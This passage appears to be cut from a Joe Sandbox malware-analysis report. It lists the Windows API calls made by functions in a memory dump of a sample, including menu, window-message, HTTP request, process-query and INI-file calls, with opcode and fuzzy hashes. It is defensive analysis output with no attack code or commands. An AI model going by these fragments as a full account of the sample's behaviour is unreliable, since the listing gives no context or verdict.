                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00165F31
                                                                                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00165F5B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
• Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 4152858687-4108050209
                                                                                                                                                          • Opcode ID: d2b893db2c201de303536d553f2c2093a43197f41161d68bd8191e7ac4f4fd6e
                                                                                                                                                          • Instruction ID: 55081d0e80369b6a05f296bacc10294300343ef95fd68ae6bfae5b2489103454
                                                                                                                                                          • Opcode Fuzzy Hash: d2b893db2c201de303536d553f2c2093a43197f41161d68bd8191e7ac4f4fd6e
                                                                                                                                                          • Instruction Fuzzy Hash: FD51F131514B12ABD7149B28DC45ABBB7EAAF95350F080A2DF891D31E1EB70CD64C792
                                                                                                                                                          APIs
                                                                                                                                                          • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 001610B8
                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001610EE
                                                                                                                                                          • 6CA06DE0.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 001610FF
                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00161181
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode$CreateInstance
                                                                                                                                                          • String ID: DllGetClassObject
                                                                                                                                                          • API String ID: 2994846969-1075368562
                                                                                                                                                          • Opcode ID: 632e73d76807c30c005e02bcc62995cadd616ebf81546aa2e0f5ddf71846d318
                                                                                                                                                          • Instruction ID: 5b589a7ff4c660cc829f5d869cede252fcdfb6b7968ec0361e4292d6a346104a
                                                                                                                                                          • Opcode Fuzzy Hash: 632e73d76807c30c005e02bcc62995cadd616ebf81546aa2e0f5ddf71846d318
                                                                                                                                                          • Instruction Fuzzy Hash: AC414AB1600604BFDB05CF64CC84AAA7BA9EF46354F1984A9EE09DF206D7B1D954CBA0
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00165A93
                                                                                                                                                          • GetMenuItemInfoW.USER32 ref: 00165AAF
                                                                                                                                                          • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00165AF5
                                                                                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001E18F0,00000000), ref: 00165B3E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 1173514356-4108050209
                                                                                                                                                          • Opcode ID: f66f94b6c435b6e1e75b6843209d779ac4bf19d9a3474cc339c239bffd3eb74b
                                                                                                                                                          • Instruction ID: e19974871129547343b9260462b640a896d78e71e95a05ff6131957aa6140574
                                                                                                                                                          • Opcode Fuzzy Hash: f66f94b6c435b6e1e75b6843209d779ac4bf19d9a3474cc339c239bffd3eb74b
                                                                                                                                                          • Instruction Fuzzy Hash: C341C071204711AFDB24DF24DC84B2AB7EAEF89314F04461DF9A59B2D1D770E810CB66
                                                                                                                                                          APIs
                                                                                                                                                          • CharLowerBuffW.USER32(?,?,?,?), ref: 00180478
                                                                                                                                                            • Part of subcall function 00127F40: _memmove.LIBCMT ref: 00127F8F
                                                                                                                                                            • Part of subcall function 0012A2FB: _memmove.LIBCMT ref: 0012A33D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove$BuffCharLower
                                                                                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                          • API String ID: 2411302734-567219261
                                                                                                                                                          • Opcode ID: c01e8952875990fcc8484e07368126ae761565ad08acc85824ddeeb1bcd041b1
                                                                                                                                                          • Instruction ID: 378bcb5c2769d4120631bb21394d3a123aa1df19d9e00ca5bf05ded1c0ebb7dd
                                                                                                                                                          • Opcode Fuzzy Hash: c01e8952875990fcc8484e07368126ae761565ad08acc85824ddeeb1bcd041b1
                                                                                                                                                          • Instruction Fuzzy Hash: B731B270500619ABCF05EF58D9809EEB7B5FF29310F10862AE476A72D1DB31EA09CF50
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0015C684
                                                                                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0015C697
                                                                                                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 0015C6C7
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$_memmove
                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                          • API String ID: 458670788-1403004172
                                                                                                                                                          • Opcode ID: e83dff2e97a6b3a4f5fc504f7920ef212651664df196a5d557bdaad6ac5c48a4
                                                                                                                                                          • Instruction ID: 617648559fa446c9ffdb4757063626e36cc7854cade1ee4f22b5d4ac5ab09c89
                                                                                                                                                          • Opcode Fuzzy Hash: e83dff2e97a6b3a4f5fc504f7920ef212651664df196a5d557bdaad6ac5c48a4
                                                                                                                                                          • Instruction Fuzzy Hash: DF21F671900204BEDB08AF64D885DFFB7A9DF26311B104119F836EB2E0EB744E4A9790
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001231B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001231DA
                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00166A2B
                                                                                                                                                          • _wcscmp.LIBCMT ref: 00166A49
                                                                                                                                                            • Part of subcall function 00166D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00166DBA
                                                                                                                                                            • Part of subcall function 00166D6D: GetLastError.KERNEL32 ref: 00166DC5
                                                                                                                                                            • Part of subcall function 00166D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00166DD9
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166AA4
                                                                                                                                                          • SHFileOperationW.SHELL32(?), ref: 00166B0C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$AttributesCreateDirectoryErrorFullLastNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                                                          • String ID: \*.*
                                                                                                                                                          • API String ID: 3499371447-1173974218
                                                                                                                                                          • Opcode ID: 69bbd2412d2ae1a07fe28d6cee5b60dc7558152a65bf8db4b58fd41a9d211429
                                                                                                                                                          • Instruction ID: bdcc48ee3b8c17dd3bb40cecc916e1c45ed669c0f55c00237ddf324e722f43a4
                                                                                                                                                          • Opcode Fuzzy Hash: 69bbd2412d2ae1a07fe28d6cee5b60dc7558152a65bf8db4b58fd41a9d211429
                                                                                                                                                          • Instruction Fuzzy Hash: 2D3161B1800229AACF51EFA4EC45ADDB7B8AF18300F5045EAE509E3151EB349B99CF64
                                                                                                                                                          APIs
                                                                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00174A60
                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00174A86
                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00174AB6
                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00174AFD
                                                                                                                                                            • Part of subcall function 001756A9: GetLastError.KERNEL32(?,?,00174A2B,00000000,00000000,00000001), ref: 001756BE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1951874230-3916222277
                                                                                                                                                          • Opcode ID: 377d3d63a4becd9dc99e59e5cce1e8c4ae2a8a18fcaee533e7969864db86bf24
                                                                                                                                                          • Instruction ID: 315b83184b056d7098796bce4a3003b7742eeb8ecea03f445eb4fdb15c3a1355
                                                                                                                                                          • Opcode Fuzzy Hash: 377d3d63a4becd9dc99e59e5cce1e8c4ae2a8a18fcaee533e7969864db86bf24
                                                                                                                                                          • Instruction Fuzzy Hash: B121BEB5540608BFEB25DFA49C85EBBB6FCEB49748F10801AF10A93540EB70CD458760
                                                                                                                                                          APIs
                                                                                                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0019454E
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          • _memset.LIBCMT ref: 00123965
                                                                                                                                                          • _wcscpy.LIBCMT ref: 001239B5
                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 001239C6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                                          • String ID: Line:
                                                                                                                                                          • API String ID: 3942752672-1585850449
                                                                                                                                                          • Opcode ID: e54243988dc24c235af78109daa3fb9adb428698d48db38c4ed62f40d5654439
                                                                                                                                                          • Instruction ID: 5434da08a6468e6c18161063f82202e1fef2da7d3098fd79bf6f7d7f532d1f97
                                                                                                                                                          • Opcode Fuzzy Hash: e54243988dc24c235af78109daa3fb9adb428698d48db38c4ed62f40d5654439
                                                                                                                                                          • Instruction Fuzzy Hash: 2731B371408350BBDB21EBA0EC45FDF77E8AB65314F00451EF195825A1DB749AE8CB92
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0013C657
                                                                                                                                                            • Part of subcall function 0013C619: GetStockObject.GDI32(00000011), ref: 0013C66B
                                                                                                                                                            • Part of subcall function 0013C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0013C675
                                                                                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00188F69
                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00188F70
                                                                                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00188F85
                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00188F8D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                          • String ID: SysAnimate32
                                                                                                                                                          • API String ID: 4146253029-1011021900
                                                                                                                                                          • Opcode ID: 51d7eed6ed49606eebb83d9c2c62cd3a5ab57b850526eae3d104cb5923af687b
                                                                                                                                                          • Instruction ID: b56dea197696bf8a9dcdfb61fc37ce7b0e8c6e5b91c50ba06bc92baaabf7210b
                                                                                                                                                          • Opcode Fuzzy Hash: 51d7eed6ed49606eebb83d9c2c62cd3a5ab57b850526eae3d104cb5923af687b
                                                                                                                                                          • Instruction Fuzzy Hash: B221FD71200205AFEF106F64EC80EBB37AEEF59324F904628FB1597190CB31DD909B60
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0016E392
                                                                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 0016E3E6
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016E3FF
                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,001BDBF0), ref: 0016E43D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                          • String ID: %lu
                                                                                                                                                          • API String ID: 3164766367-685833217
                                                                                                                                                          • Opcode ID: bc5cd7fc72658e66f66909c760a5b77cabb499039ee1f45a44b927797e731fd4
                                                                                                                                                          • Instruction ID: a2788f8638c2f5c7c49138ebe304063f49a336f95bed36a9eb2d65ea589f6df5
                                                                                                                                                          • Opcode Fuzzy Hash: bc5cd7fc72658e66f66909c760a5b77cabb499039ee1f45a44b927797e731fd4
                                                                                                                                                          • Instruction Fuzzy Hash: 40218039A40108AFCB10EFA4DC85EEEB7B8EF59714F104069F509D7251E731DA51CB51
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                            • Part of subcall function 0015D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0015D640
                                                                                                                                                            • Part of subcall function 0015D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 0015D653
                                                                                                                                                            • Part of subcall function 0015D623: GetCurrentThreadId.KERNEL32 ref: 0015D65A
                                                                                                                                                            • Part of subcall function 0015D623: AttachThreadInput.USER32(00000000), ref: 0015D661
                                                                                                                                                          • GetFocus.USER32 ref: 0015D7FB
                                                                                                                                                            • Part of subcall function 0015D66C: GetParent.USER32(?), ref: 0015D67A
                                                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0015D844
                                                                                                                                                          • EnumChildWindows.USER32(?,0015D8BA), ref: 0015D86C
                                                                                                                                                          • __swprintf.LIBCMT ref: 0015D886
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                                          • String ID: %s%d
                                                                                                                                                          • API String ID: 1941087503-1110647743
                                                                                                                                                          • Opcode ID: f481871a2624198544732b49f1884e5f4eeab0a0367af31357bec753fa86a8ae
                                                                                                                                                          • Instruction ID: b9c2f3256460ea09d3aa36b7691149f1580c2562bf7c2d454952bf84c0adbcd1
                                                                                                                                                          • Opcode Fuzzy Hash: f481871a2624198544732b49f1884e5f4eeab0a0367af31357bec753fa86a8ae
                                                                                                                                                          • Instruction Fuzzy Hash: 8611D371600205ABDF21BF60EC86FEA3779AF54705F0040B9FE1DAE186DBB459498B70
                                                                                                                                                          APIs
                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001818E4
                                                                                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00181917
                                                                                                                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00181A3A
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00181AB0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2364364464-0
                                                                                                                                                          • Opcode ID: d3ea0c918a0ecb8f598bd7c975e75e1630ce00d534e6e74040caa09d00379f40
                                                                                                                                                          • Instruction ID: d287c1c1cb56e8a8c045e6596fe834d2da39e9558e852becf794dd9b945d915c
                                                                                                                                                          • Opcode Fuzzy Hash: d3ea0c918a0ecb8f598bd7c975e75e1630ce00d534e6e74040caa09d00379f40
                                                                                                                                                          • Instruction Fuzzy Hash: 89817471A40214BBDF14EF64C886BAD7BF9AF48720F148459F905AF382D7B4EA418F90
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                          • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 001805DF
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,?,?,?,00000004,00000004,?,?), ref: 0018066E
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,00000000,00000004,00000004,?,?), ref: 0018068C
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,?,?,?,00000041,00000004), ref: 001806D2
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000004), ref: 001806EC
                                                                                                                                                            • Part of subcall function 0013F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0016AEA5,?,?,00000000,00000008), ref: 0013F282
                                                                                                                                                            • Part of subcall function 0013F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0016AEA5,?,?,00000000,00000008), ref: 0013F2A6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2773980681-0
                                                                                                                                                          • Opcode ID: 3d2f2ba2ce37a69d51a2cefbf772cc4a567fe44e20c9e4807466d687a7d5145a
                                                                                                                                                          • Instruction ID: ea43d5bd68729c2d07b9a584de2517b428f45e2ba9a010db4fafdcd0d855148a
                                                                                                                                                          • Opcode Fuzzy Hash: 3d2f2ba2ce37a69d51a2cefbf772cc4a567fe44e20c9e4807466d687a7d5145a
                                                                                                                                                          • Instruction Fuzzy Hash: 58518C75A00219DFCB01EFA8D4909ADB7B5FF6C310B158055E946AB352EB30EE55CF90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c8bebf919b5651e318154118bc2602a56b128488e5ee94743b4b9923df7727a0
                                                                                                                                                          • Instruction ID: 02a6312b8940d999af7b00c0ff421a643bc0f30f69fd5cd8c6ed475dd4821a46
                                                                                                                                                          • Opcode Fuzzy Hash: c8bebf919b5651e318154118bc2602a56b128488e5ee94743b4b9923df7727a0
                                                                                                                                                          • Instruction Fuzzy Hash: C641D235900504BFD724EF78DC49FA9BBA9EB0A360F154255F91AA76D1C730AE40DFA0
                                                                                                                                                          APIs
                                                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001717D4
                                                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 001717FD
                                                                                                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0017183C
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00171861
                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00171869
